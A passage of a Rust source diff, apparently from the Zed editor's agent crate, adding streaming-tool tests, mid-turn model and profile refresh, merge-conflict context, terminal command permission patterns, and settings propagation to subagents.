["Use the streaming_echo tool and the streaming_failing_echo tool"], + cx, + ) + }) + .unwrap(); + cx.run_until_parked(); + + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "call_1".into(), + name: StreamingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({ "text": "hello" }), + is_input_complete: false, + thought_signature: None, + }, + )); + let first_tool_use = LanguageModelToolUse { + id: "call_1".into(), + name: StreamingEchoTool::NAME.into(), + raw_input: "hello world".into(), + input: json!({ "text": "hello world" }), + is_input_complete: true, + thought_signature: None, + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + first_tool_use.clone(), + )); + let second_tool_use = LanguageModelToolUse { + name: StreamingFailingEchoTool::NAME.into(), + raw_input: "hello".into(), + input: json!({ "text": "hello" }), + is_input_complete: false, + thought_signature: None, + id: "call_2".into(), + }; + fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + second_tool_use.clone(), + )); + + cx.run_until_parked(); + + complete_streaming_echo_tool_call_tx.send(()).unwrap(); + + cx.run_until_parked(); + + let completions = fake_model.pending_completions(); + let last_completion = completions.last().unwrap(); + + assert_eq!( + last_completion.messages[1..], + vec![ + LanguageModelRequestMessage { + role: Role::User, + content: vec![ + "Use the streaming_echo tool and the streaming_failing_echo tool".into() + ], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::Assistant, + content: vec![ + language_model::MessageContent::ToolUse(first_tool_use.clone()), + language_model::MessageContent::ToolUse(second_tool_use.clone()) + ], + cache: false, + reasoning_details: None, + }, + LanguageModelRequestMessage { + role: Role::User, + content: vec![ + language_model::MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: second_tool_use.id.clone(), + tool_name: second_tool_use.name, + is_error: true, + content: "failed".into(), + output: Some("failed".into()), + }), + language_model::MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: first_tool_use.id.clone(), + tool_name: first_tool_use.name, + is_error: false, + content: "hello world".into(), + output: Some("hello world".into()), + }), + ], + cache: true, + reasoning_details: None, + }, + ] + ); +} + +#[gpui::test] +async fn test_mid_turn_model_and_settings_refresh(cx: &mut TestAppContext) { + let ThreadTest { + model, thread, fs, .. + } = setup(cx, TestModel::Fake).await; + let fake_model_a = model.as_fake(); + + thread.update(cx, |thread, _cx| { + thread.add_tool(EchoTool); + thread.add_tool(DelayTool); + }); + + // Set up two profiles: profile-a has both tools, profile-b has only DelayTool. + fs.insert_file( + paths::settings_file(), + json!({ + "agent": { + "profiles": { + "profile-a": { + "name": "Profile A", + "tools": { + EchoTool::NAME: true, + DelayTool::NAME: true, + } + }, + "profile-b": { + "name": "Profile B", + "tools": { + DelayTool::NAME: true, + } + } + } + } + }) + .to_string() + .into_bytes(), + ) + .await; + cx.run_until_parked(); + + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-a".into()), cx); + thread.set_thinking_enabled(false, cx); + }); + + // Send a message — first iteration starts with model A, profile-a, thinking off. + thread + .update(cx, |thread, cx| { + thread.send(UserMessageId::new(), ["test mid-turn refresh"], cx) + }) + .unwrap(); + cx.run_until_parked(); + + // Verify first request has both tools and thinking disabled. + let completions = fake_model_a.pending_completions(); + assert_eq!(completions.len(), 1); + let first_tools = tool_names_for_completion(&completions[0]); + assert_eq!(first_tools, vec![DelayTool::NAME, EchoTool::NAME]); + assert!(!completions[0].thinking_allowed); + + // Model A responds with an echo tool call. + fake_model_a.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: "tool_1".into(), + name: "echo".into(), + raw_input: r#"{"text":"hello"}"#.into(), + input: json!({"text": "hello"}), + is_input_complete: true, + thought_signature: None, + }, + )); + fake_model_a.end_last_completion_stream(); + + // Before the next iteration runs, switch to profile-b (only DelayTool), + // swap in a new model, and enable thinking. + let fake_model_b = Arc::new(FakeLanguageModel::with_id_and_thinking( + "test-provider", + "model-b", + "Model B", + true, + )); + thread.update(cx, |thread, cx| { + thread.set_profile(AgentProfileId("profile-b".into()), cx); + thread.set_model(fake_model_b.clone() as Arc, cx); + thread.set_thinking_enabled(true, cx); + }); + + // Run until parked — processes the echo tool call, loops back, picks up + // the new model/profile/thinking, and makes a second request to model B. + cx.run_until_parked(); + + // The second request should have gone to model B. + let model_b_completions = fake_model_b.pending_completions(); + assert_eq!( + model_b_completions.len(), + 1, + "second request should go to model B" + ); + + // Profile-b only has DelayTool, so echo should be gone. + let second_tools = tool_names_for_completion(&model_b_completions[0]); + assert_eq!(second_tools, vec![DelayTool::NAME]); + + // Thinking should now be enabled. + assert!(model_b_completions[0].thinking_allowed); +} diff --git a/crates/agent/src/tests/test_tools.rs b/crates/agent/src/tests/test_tools.rs index e0794ee322cdf2c77c37d1d22f30ec77c5642d24..4744204fae1213d49af92339b8847e9d1f470125 100644 --- a/crates/agent/src/tests/test_tools.rs +++ b/crates/agent/src/tests/test_tools.rs @@ -2,9 +2,191 @@ use super::*; use agent_settings::AgentSettings; use gpui::{App, SharedString, Task}; use std::future; +use std::sync::Mutex; use std::sync::atomic::{AtomicBool, Ordering}; use std::time::Duration; +/// A streaming tool that echoes its input, used to test streaming tool +/// lifecycle (e.g. partial delivery and cleanup when the LLM stream ends +/// before `is_input_complete`). +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingEchoToolInput { + /// The text to echo. + pub text: String, +} + +pub struct StreamingEchoTool { + wait_until_complete_rx: Mutex>>, +} + +impl StreamingEchoTool { + pub fn new() -> Self { + Self { + wait_until_complete_rx: Mutex::new(None), + } + } + + pub fn with_wait_until_complete(mut self, receiver: oneshot::Receiver<()>) -> Self { + self.wait_until_complete_rx = Mutex::new(Some(receiver)); + self + } +} + +impl AgentTool for StreamingEchoTool { + type Input = StreamingEchoToolInput; + type Output = String; + + const NAME: &'static str = "streaming_echo"; + + fn supports_input_streaming() -> bool { + true + } + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "Streaming Echo".into() + } + + fn run( + self: Arc, + input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + let wait_until_complete_rx = self.wait_until_complete_rx.lock().unwrap().take(); + cx.spawn(async move |_cx| { + let input = input + .recv() + .await + .map_err(|e| format!("Failed to receive tool input: {e}"))?; + if let Some(rx) = wait_until_complete_rx { + rx.await.ok(); + } + Ok(input.text) + }) + } +} + +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingJsonErrorContextToolInput { + /// The text to echo. + pub text: String, +} + +pub struct StreamingJsonErrorContextTool; + +impl AgentTool for StreamingJsonErrorContextTool { + type Input = StreamingJsonErrorContextToolInput; + type Output = String; + + const NAME: &'static str = "streaming_json_error_context"; + + fn supports_input_streaming() -> bool { + true + } + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "Streaming JSON Error Context".into() + } + + fn run( + self: Arc, + mut input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + let mut last_partial_text = None; + + loop { + match input.next().await { + Ok(ToolInputPayload::Partial(partial)) => { + if let Some(text) = partial.get("text").and_then(|value| value.as_str()) { + last_partial_text = Some(text.to_string()); + } + } + Ok(ToolInputPayload::Full(input)) => return Ok(input.text), + Ok(ToolInputPayload::InvalidJson { error_message }) => { + let partial_text = last_partial_text.unwrap_or_default(); + return Err(format!( + "Saw partial text '{partial_text}' before invalid JSON: {error_message}" + )); + } + Err(error) => { + return Err(format!("Failed to receive tool input: {error}")); + } + } + } + }) + } +} + +/// A streaming tool that echoes its input, used to test streaming tool +/// lifecycle (e.g. partial delivery and cleanup when the LLM stream ends +/// before `is_input_complete`). +#[derive(JsonSchema, Serialize, Deserialize)] +pub struct StreamingFailingEchoToolInput { + /// The text to echo. + pub text: String, +} + +pub struct StreamingFailingEchoTool { + pub receive_chunks_until_failure: usize, +} + +impl AgentTool for StreamingFailingEchoTool { + type Input = StreamingFailingEchoToolInput; + + type Output = String; + + const NAME: &'static str = "streaming_failing_echo"; + + fn kind() -> acp::ToolKind { + acp::ToolKind::Other + } + + fn supports_input_streaming() -> bool { + true + } + + fn initial_title( + &self, + _input: Result, + _cx: &mut App, + ) -> SharedString { + "echo".into() + } + + fn run( + self: Arc, + mut input: ToolInput, + _event_stream: ToolCallEventStream, + cx: &mut App, + ) -> Task> { + cx.spawn(async move |_cx| { + for _ in 0..self.receive_chunks_until_failure { + let _ = input.next().await; + } + Err("failed".into()) + }) + } +} + /// A tool that echoes its input #[derive(JsonSchema, Serialize, Deserialize)] pub struct EchoToolInput { diff --git a/crates/agent/src/thread.rs b/crates/agent/src/thread.rs index 63e180e7a9686991ba67e813c51b65bcc5a8bedf..ea342e8db4e4d97d5eccc849121cd0fd2e403017 100644 --- a/crates/agent/src/thread.rs +++ b/crates/agent/src/thread.rs @@ -3,45 +3,43 @@ use crate::{ DeletePathTool, DiagnosticsTool, EditFileTool, FetchTool, FindPathTool, GrepTool, ListDirectoryTool, MovePathTool, NowTool, OpenTool, ProjectSnapshot, ReadFileTool, RestoreFileFromDiskTool, SaveFileTool, SpawnAgentTool, StreamingEditFileTool, - SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, WebSearchTool, - decide_permission_from_settings, + SystemPromptTemplate, Template, Templates, TerminalTool, ToolPermissionDecision, + UpdatePlanTool, WebSearchTool, decide_permission_from_settings, }; use acp_thread::{MentionUri, UserMessageId}; use action_log::ActionLog; use feature_flags::{ - FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, SubagentsFeatureFlag, + FeatureFlagAppExt as _, StreamingEditFileToolFeatureFlag, UpdatePlanToolFeatureFlag, }; use agent_client_protocol as acp; use agent_settings::{ - AgentProfileId, AgentProfileSettings, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, - SUMMARIZE_THREAD_PROMPT, + AgentProfileId, AgentSettings, SUMMARIZE_THREAD_DETAILED_PROMPT, SUMMARIZE_THREAD_PROMPT, }; use anyhow::{Context as _, Result, anyhow}; use chrono::{DateTime, Utc}; use client::UserStore; use cloud_api_types::Plan; -use cloud_llm_client::CompletionIntent; use collections::{HashMap, HashSet, IndexMap}; use fs::Fs; -use futures::stream; use futures::{ FutureExt, channel::{mpsc, oneshot}, future::Shared, stream::FuturesUnordered, }; +use futures::{StreamExt, stream}; use gpui::{ App, AppContext, AsyncApp, Context, Entity, EventEmitter, SharedString, Task, WeakEntity, }; use heck::ToSnakeCase as _; use language_model::{ - LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, - LanguageModelImage, LanguageModelProviderId, LanguageModelRegistry, LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelRequestTool, LanguageModelToolResult, - LanguageModelToolResultContent, LanguageModelToolSchemaFormat, LanguageModelToolUse, - LanguageModelToolUseId, Role, SelectedModel, Speed, StopReason, TokenUsage, - ZED_CLOUD_PROVIDER_ID, + CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelId, LanguageModelImage, LanguageModelProviderId, LanguageModelRegistry, + LanguageModelRequest, LanguageModelRequestMessage, LanguageModelRequestTool, + LanguageModelToolResult, LanguageModelToolResultContent, LanguageModelToolSchemaFormat, + LanguageModelToolUse, LanguageModelToolUseId, Role, SelectedModel, Speed, StopReason, + TokenUsage, ZED_CLOUD_PROVIDER_ID, }; use project::Project; use prompt_store::ProjectContext; @@ -49,7 +47,6 @@ use schemars::{JsonSchema, Schema}; use serde::de::DeserializeOwned; use serde::{Deserialize, Serialize}; use settings::{LanguageModelSelection, Settings, ToolPermissionMode, update_settings_file}; -use smol::stream::StreamExt; use std::{ collections::BTreeMap, marker::PhantomData, @@ -221,6 +218,7 @@ impl UserMessage { "\nThe user has specified the following rules that should be applied:\n"; const OPEN_DIAGNOSTICS_TAG: &str = ""; const OPEN_DIFFS_TAG: &str = ""; + const MERGE_CONFLICT_TAG: &str = ""; let mut file_context = OPEN_FILES_TAG.to_string(); let mut directory_context = OPEN_DIRECTORIES_TAG.to_string(); @@ -231,6 +229,7 @@ impl UserMessage { let mut rules_context = OPEN_RULES_TAG.to_string(); let mut diagnostics_context = OPEN_DIAGNOSTICS_TAG.to_string(); let mut diffs_context = OPEN_DIFFS_TAG.to_string(); + let mut merge_conflict_context = MERGE_CONFLICT_TAG.to_string(); for chunk in &self.content { let chunk = match chunk { @@ -253,7 +252,7 @@ impl UserMessage { ) .ok(); } - MentionUri::PastedImage => { + MentionUri::PastedImage { .. } => { debug_panic!("pasted image URI should not be used in mention content") } MentionUri::Directory { .. } => { @@ -295,9 +294,6 @@ impl UserMessage { MentionUri::Thread { .. } => { write!(&mut thread_context, "\n{}\n", content).ok(); } - MentionUri::TextThread { .. } => { - write!(&mut thread_context, "\n{}\n", content).ok(); - } MentionUri::Rule { .. } => { write!( &mut rules_context, @@ -338,6 +334,18 @@ impl UserMessage { ) .ok(); } + MentionUri::MergeConflict { file_path } => { + write!( + &mut merge_conflict_context, + "\nMerge conflict in {}:\n{}", + file_path, + MarkdownCodeBlock { + tag: "diff", + text: content + } + ) + .ok(); + } } language_model::MessageContent::Text(uri.as_link().to_string()) @@ -412,6 +420,13 @@ impl UserMessage { .push(language_model::MessageContent::Text(diagnostics_context)); } + if merge_conflict_context.len() > MERGE_CONFLICT_TAG.len() { + merge_conflict_context.push_str("\n"); + message + .content + .push(language_model::MessageContent::Text(merge_conflict_context)); + } + if message.content.len() > len_before_context { message.content.insert( len_before_context, @@ -605,7 +620,12 @@ pub trait TerminalHandle { } pub trait SubagentHandle { + /// The session ID of this subagent thread fn id(&self) -> acp::SessionId; + /// The current number of entries in the thread. + /// Useful for knowing where the next turn will begin + fn num_entries(&self, cx: &App) -> usize; + /// Runs a turn for a given message and returns both the response and the index of that output message. fn send(&self, message: String, cx: &AsyncApp) -> Task>; } @@ -638,6 +658,7 @@ pub enum ThreadEvent { AgentThinking(String), ToolCall(acp::ToolCall), ToolCallUpdate(acp_thread::ToolCallUpdate), + Plan(acp::Plan), ToolCallAuthorization(ToolCallAuthorization), SubagentSpawned(acp::SessionId), Retry(acp_thread::RetryStatus), @@ -735,6 +756,48 @@ impl ToolPermissionContext { true }; + // For terminal commands with multiple pipeline commands, use DropdownWithPatterns + // to let users individually select which command patterns to always allow. + if tool_name == TerminalTool::NAME && shell_supports_always_allow { + if let Some(input) = input_values.first() { + let all_patterns = extract_all_terminal_patterns(input); + if all_patterns.len() > 1 { + let mut choices = Vec::new(); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_allow:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::AllowAlways, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(format!("always_deny:{}", tool_name)), + format!("Always for {}", tool_name.replace('_', " ")), + acp::PermissionOptionKind::RejectAlways, + ), + sub_patterns: vec![], + }); + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new("allow"), + "Only this time", + acp::PermissionOptionKind::AllowOnce, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new("deny"), + "Only this time", + acp::PermissionOptionKind::RejectOnce, + ), + sub_patterns: vec![], + }); + return acp_thread::PermissionOptions::DropdownWithPatterns { + choices, + patterns: all_patterns, + tool_name: tool_name.clone(), + }; + } + } + } + let extract_for_value = |value: &str| -> (Option, Option) { if tool_name == TerminalTool::NAME { ( @@ -783,20 +846,22 @@ impl ToolPermissionContext { let mut choices = Vec::new(); - let mut push_choice = |label: String, allow_id, deny_id, allow_kind, deny_kind| { - choices.push(acp_thread::PermissionOptionChoice { - allow: acp::PermissionOption::new( - acp::PermissionOptionId::new(allow_id), - label.clone(), - allow_kind, - ), - deny: acp::PermissionOption::new( - acp::PermissionOptionId::new(deny_id), - label, - deny_kind, - ), - }); - }; + let mut push_choice = + |label: String, allow_id, deny_id, allow_kind, deny_kind, sub_patterns: Vec| { + choices.push(acp_thread::PermissionOptionChoice { + allow: acp::PermissionOption::new( + acp::PermissionOptionId::new(allow_id), + label.clone(), + allow_kind, + ), + deny: acp::PermissionOption::new( + acp::PermissionOptionId::new(deny_id), + label, + deny_kind, + ), + sub_patterns, + }); + }; if shell_supports_always_allow { push_choice( @@ -805,6 +870,7 @@ impl ToolPermissionContext { format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![], ); if let (Some(pattern), Some(display)) = (pattern, pattern_display) { @@ -815,10 +881,11 @@ impl ToolPermissionContext { }; push_choice( button_text, - format!("always_allow_pattern:{}\n{}", tool_name, pattern), - format!("always_deny_pattern:{}\n{}", tool_name, pattern), + format!("always_allow:{}", tool_name), + format!("always_deny:{}", tool_name), acp::PermissionOptionKind::AllowAlways, acp::PermissionOptionKind::RejectAlways, + vec![pattern], ); } } @@ -829,6 +896,7 @@ impl ToolPermissionContext { "deny".to_string(), acp::PermissionOptionKind::AllowOnce, acp::PermissionOptionKind::RejectOnce, + vec![], ); acp_thread::PermissionOptions::Dropdown(choices) @@ -839,7 +907,7 @@ impl ToolPermissionContext { pub struct ToolCallAuthorization { pub tool_call: acp::ToolCallUpdate, pub options: acp_thread::PermissionOptions, - pub response: oneshot::Sender, + pub response: oneshot::Sender, pub context: Option, } @@ -890,12 +958,13 @@ pub struct Thread { pub(crate) prompt_capabilities_rx: watch::Receiver, pub(crate) project: Entity, pub(crate) action_log: Entity, - /// Tracks the last time files were read by the agent, to detect external modifications - pub(crate) file_read_times: HashMap, /// True if this thread was imported from a shared thread and can be synced. imported: bool, /// If this is a subagent thread, contains context about the parent subagent_context: Option, + /// The user's unsent prompt text, persisted so it can be restored when reloading the thread. + draft_prompt: Option>, + ui_scroll_position: Option, /// Weak references to running subagent threads for cancellation propagation running_subagents: Vec>, } @@ -914,12 +983,16 @@ impl Thread { let context_server_registry = parent_thread.read(cx).context_server_registry.clone(); let templates = parent_thread.read(cx).templates.clone(); let model = parent_thread.read(cx).model().cloned(); - let mut thread = Self::new( + let parent_action_log = parent_thread.read(cx).action_log().clone(); + let action_log = + cx.new(|_cx| ActionLog::new(project.clone()).with_linked_action_log(parent_action_log)); + let mut thread = Self::new_internal( project, project_context, context_server_registry, templates, model, + action_log, cx, ); thread.subagent_context = Some(SubagentContext { @@ -936,6 +1009,26 @@ impl Thread { templates: Arc, model: Option>, cx: &mut Context, + ) -> Self { + Self::new_internal( + project.clone(), + project_context, + context_server_registry, + templates, + model, + cx.new(|_cx| ActionLog::new(project)), + cx, + ) + } + + fn new_internal( + project: Entity, + project_context: Entity, + context_server_registry: Entity, + templates: Arc, + model: Option>, + action_log: Entity, + cx: &mut Context, ) -> Self { let settings = AgentSettings::get_global(cx); let profile_id = settings.default_profile.clone(); @@ -947,7 +1040,6 @@ impl Thread { .default_model .as_ref() .and_then(|model| model.effort.clone()); - let action_log = cx.new(|_cx| ActionLog::new(project.clone())); let (prompt_capabilities_tx, prompt_capabilities_rx) = watch::channel(Self::prompt_capabilities(model.as_deref())); Self { @@ -985,9 +1077,10 @@ impl Thread { prompt_capabilities_rx, project, action_log, - file_read_times: HashMap::default(), imported: false, subagent_context: None, + draft_prompt: None, + ui_scroll_position: None, running_subagents: Vec::new(), } } @@ -1200,9 +1293,13 @@ impl Thread { updated_at: db_thread.updated_at, prompt_capabilities_tx, prompt_capabilities_rx, - file_read_times: HashMap::default(), imported: db_thread.imported, subagent_context: db_thread.subagent_context, + draft_prompt: db_thread.draft_prompt, + ui_scroll_position: db_thread.ui_scroll_position.map(|sp| gpui::ListOffset { + item_ix: sp.item_ix, + offset_in_item: gpui::px(sp.offset_in_item), + }), running_subagents: Vec::new(), } } @@ -1210,7 +1307,7 @@ impl Thread { pub fn to_db(&self, cx: &App) -> Task { let initial_project_snapshot = self.initial_project_snapshot.clone(); let mut thread = DbThread { - title: self.title(), + title: self.title().unwrap_or_default(), messages: self.messages.clone(), updated_at: self.updated_at, detailed_summary: self.summary.clone(), @@ -1227,6 +1324,13 @@ impl Thread { speed: self.speed, thinking_enabled: self.thinking_enabled, thinking_effort: self.thinking_effort.clone(), + draft_prompt: self.draft_prompt.clone(), + ui_scroll_position: self.ui_scroll_position.map(|lo| { + crate::db::SerializedScrollPosition { + item_ix: lo.item_ix, + offset_in_item: lo.offset_in_item.as_f32(), + } + }), }; cx.background_spawn(async move { @@ -1268,19 +1372,42 @@ impl Thread { self.messages.is_empty() && self.title.is_none() } + pub fn draft_prompt(&self) -> Option<&[acp::ContentBlock]> { + self.draft_prompt.as_deref() + } + + pub fn set_draft_prompt(&mut self, prompt: Option>) { + self.draft_prompt = prompt; + } + + pub fn ui_scroll_position(&self) -> Option { + self.ui_scroll_position + } + + pub fn set_ui_scroll_position(&mut self, position: Option) { + self.ui_scroll_position = position; + } + pub fn model(&self) -> Option<&Arc> { self.model.as_ref() } pub fn set_model(&mut self, model: Arc, cx: &mut Context) { let old_usage = self.latest_token_usage(); - self.model = Some(model); + self.model = Some(model.clone()); let new_caps = Self::prompt_capabilities(self.model.as_deref()); let new_usage = self.latest_token_usage(); if old_usage != new_usage { cx.emit(TokenUsageUpdated(new_usage)); } self.prompt_capabilities_tx.send(new_caps).log_err(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_model(model.clone(), cx)) + .ok(); + } + cx.notify() } @@ -1293,7 +1420,15 @@ impl Thread { model: Option>, cx: &mut Context, ) { - self.summarization_model = model; + self.summarization_model = model.clone(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| { + thread.set_summarization_model(model.clone(), cx) + }) + .ok(); + } cx.notify() } @@ -1303,6 +1438,12 @@ impl Thread { pub fn set_thinking_enabled(&mut self, enabled: bool, cx: &mut Context) { self.thinking_enabled = enabled; + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_thinking_enabled(enabled, cx)) + .ok(); + } cx.notify(); } @@ -1311,7 +1452,15 @@ impl Thread { } pub fn set_thinking_effort(&mut self, effort: Option, cx: &mut Context) { - self.thinking_effort = effort; + self.thinking_effort = effort.clone(); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| { + thread.set_thinking_effort(effort.clone(), cx) + }) + .ok(); + } cx.notify(); } @@ -1321,10 +1470,21 @@ impl Thread { pub fn set_speed(&mut self, speed: Speed, cx: &mut Context) { self.speed = Some(speed); + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_speed(speed, cx)) + .ok(); + } cx.notify(); } - pub fn last_message(&self) -> Option { + pub fn last_message(&self) -> Option<&Message> { + self.messages.last() + } + + #[cfg(any(test, feature = "test-support"))] + pub fn last_received_or_pending_message(&self) -> Option { if let Some(message) = self.pending_message.clone() { Some(Message::Agent(message)) } else { @@ -1337,6 +1497,9 @@ impl Thread { environment: Rc, cx: &mut Context, ) { + // Only update the agent location for the root thread, not for subagents. + let update_agent_location = self.parent_thread_id().is_none(); + let language_registry = self.project.read(cx).languages().clone(); self.add_tool(CopyPathTool::new(self.project.clone())); self.add_tool(CreateDirectoryTool::new(self.project.clone())); @@ -1354,6 +1517,7 @@ impl Thread { self.add_tool(StreamingEditFileTool::new( self.project.clone(), cx.weak_entity(), + self.action_log.clone(), language_registry, )); self.add_tool(FetchTool::new(self.project.read(cx).client().http_client())); @@ -1363,17 +1527,20 @@ impl Thread { self.add_tool(MovePathTool::new(self.project.clone())); self.add_tool(NowTool); self.add_tool(OpenTool::new(self.project.clone())); + if cx.has_flag::() { + self.add_tool(UpdatePlanTool); + } self.add_tool(ReadFileTool::new( - cx.weak_entity(), self.project.clone(), self.action_log.clone(), + update_agent_location, )); self.add_tool(SaveFileTool::new(self.project.clone())); self.add_tool(RestoreFileFromDiskTool::new(self.project.clone())); self.add_tool(TerminalTool::new(self.project.clone(), environment.clone())); self.add_tool(WebSearchTool); - if cx.has_flag::() && self.depth() < MAX_SUBAGENT_DEPTH { + if self.depth() < MAX_SUBAGENT_DEPTH { self.add_tool(SpawnAgentTool::new(environment)); } } @@ -1387,6 +1554,7 @@ impl Thread { self.tools.insert(T::NAME.into(), tool.erase()); } + #[cfg(any(test, feature = "test-support"))] pub fn remove_tool(&mut self, name: &str) -> bool { self.tools.remove(name).is_some() } @@ -1400,12 +1568,18 @@ impl Thread { return; } - self.profile_id = profile_id; + self.profile_id = profile_id.clone(); // Swap to the profile's preferred model when available. if let Some(model) = Self::resolve_profile_model(&self.profile_id, cx) { self.set_model(model, cx); } + + for subagent in &self.running_subagents { + subagent + .update(cx, |thread, cx| thread.set_profile(profile_id.clone(), cx)) + .ok(); + } } pub fn cancel(&mut self, cx: &mut Context) -> Task<()> { @@ -1626,14 +1800,6 @@ impl Thread { cx.notify(); } - #[cfg(feature = "eval")] - pub fn proceed( - &mut self, - cx: &mut Context, - ) -> Result>> { - self.run_turn(cx) - } - fn run_turn( &mut self, cx: &mut Context, @@ -1644,11 +1810,6 @@ impl Thread { self.flush_pending_message(cx); self.cancel(cx).detach(); - let model = self.model.clone().context("No language model configured")?; - let profile = AgentSettings::get_global(cx) - .profiles - .get(&self.profile_id) - .context("Profile not found")?; let (events_tx, events_rx) = mpsc::unbounded::>(); let event_stream = ThreadEventStream(events_tx); let message_ix = self.messages.len().saturating_sub(1); @@ -1656,20 +1817,15 @@ impl Thread { let (cancellation_tx, mut cancellation_rx) = watch::channel(false); self.running_turn = Some(RunningTurn { event_stream: event_stream.clone(), - tools: self.enabled_tools(profile, &model, cx), + tools: self.enabled_tools(cx), cancellation_tx, streaming_tool_inputs: HashMap::default(), _task: cx.spawn(async move |this, cx| { log::debug!("Starting agent turn execution"); - let turn_result = Self::run_turn_internal( - &this, - model, - &event_stream, - cancellation_rx.clone(), - cx, - ) - .await; + let turn_result = + Self::run_turn_internal(&this, &event_stream, cancellation_rx.clone(), cx) + .await; // Check if we were cancelled - if so, cancel() already took running_turn // and we shouldn't touch it (it might be a NEW turn now) @@ -1711,7 +1867,6 @@ impl Thread { async fn run_turn_internal( this: &WeakEntity, - model: Arc, event_stream: &ThreadEventStream, mut cancellation_rx: watch::Receiver, cx: &mut AsyncApp, @@ -1719,12 +1874,22 @@ impl Thread { let mut attempt = 0; let mut intent = CompletionIntent::UserPrompt; loop { - let request = - this.update(cx, |this, cx| this.build_completion_request(intent, cx))??; + // Re-read the model and refresh tools on each iteration so that + // mid-turn changes (e.g. the user switches model, toggles tools, + // or changes profile) take effect between tool-call rounds. + let (model, request) = this.update(cx, |this, cx| { + let model = this.model.clone().context("No language model configured")?; + this.refresh_turn_tools(cx); + let request = this.build_completion_request(intent, cx)?; + anyhow::Ok((model, request)) + })??; telemetry::event!( "Agent Thread Completion", thread_id = this.read_with(cx, |this, _| this.id.to_string())?, + parent_thread_id = this.read_with(cx, |this, _| this + .parent_thread_id() + .map(|id| id.to_string()))?, prompt_id = this.read_with(cx, |this, _| this.prompt_id.to_string())?, model = model.telemetry_id(), model_provider = model.provider_id().to_string(), @@ -1737,12 +1902,37 @@ impl Thread { Ok(events) => (events.fuse(), None), Err(err) => (stream::empty().boxed().fuse(), Some(err)), }; - let mut tool_results = FuturesUnordered::new(); + let mut tool_results: FuturesUnordered> = + FuturesUnordered::new(); + let mut early_tool_results: Vec = Vec::new(); let mut cancelled = false; loop { - // Race between getting the first event and cancellation + // Race between getting the first event, tool completion, and cancellation. let first_event = futures::select! { event = events.next().fuse() => event, + tool_result = futures::StreamExt::select_next_some(&mut tool_results) => { + let is_error = tool_result.is_error; + let is_still_streaming = this + .read_with(cx, |this, _cx| { + this.running_turn + .as_ref() + .and_then(|turn| turn.streaming_tool_inputs.get(&tool_result.tool_use_id)) + .map_or(false, |inputs| !inputs.has_received_final()) + }) + .unwrap_or(false); + + early_tool_results.push(tool_result); + + // Only break if the tool errored and we are still + // streaming the input of the tool. If the tool errored + // but we are no longer streaming its input (i.e. there + // are parallel tool calls) we want to continue + // processing those tool inputs. + if is_error && is_still_streaming { + break; + } + continue; + } _ = cancellation_rx.changed().fuse() => { if *cancellation_rx.borrow() { cancelled = true; @@ -1809,26 +1999,26 @@ impl Thread { // that need their own permits. drop(events); - let end_turn = tool_results.is_empty(); - while let Some(tool_result) = tool_results.next().await { - log::debug!("Tool finished {:?}", tool_result); + // Drop streaming tool input senders that never received their final input. + // This prevents deadlock when the LLM stream ends (e.g. because of an error) + // before sending a tool use with `is_input_complete: true`. + this.update(cx, |this, _cx| { + if let Some(running_turn) = this.running_turn.as_mut() { + if running_turn.streaming_tool_inputs.is_empty() { + return; + } + log::warn!("Dropping partial tool inputs because the stream ended"); + running_turn.streaming_tool_inputs.drain(); + } + })?; - event_stream.update_tool_call_fields( - &tool_result.tool_use_id, - acp::ToolCallUpdateFields::new() - .status(if tool_result.is_error { - acp::ToolCallStatus::Failed - } else { - acp::ToolCallStatus::Completed - }) - .raw_output(tool_result.output.clone()), - None, - ); - this.update(cx, |this, _cx| { - this.pending_message() - .tool_results - .insert(tool_result.tool_use_id.clone(), tool_result); - })?; + let end_turn = tool_results.is_empty() && early_tool_results.is_empty(); + + for tool_result in early_tool_results { + Self::process_tool_result(this, event_stream, cx, tool_result)?; + } + while let Some(tool_result) = tool_results.next().await { + Self::process_tool_result(this, event_stream, cx, tool_result)?; } this.update(cx, |this, cx| { @@ -1851,7 +2041,15 @@ impl Thread { })??; let timer = cx.background_executor().timer(retry.duration); event_stream.send_retry(retry); - timer.await; + futures::select! { + _ = timer.fuse() => {} + _ = 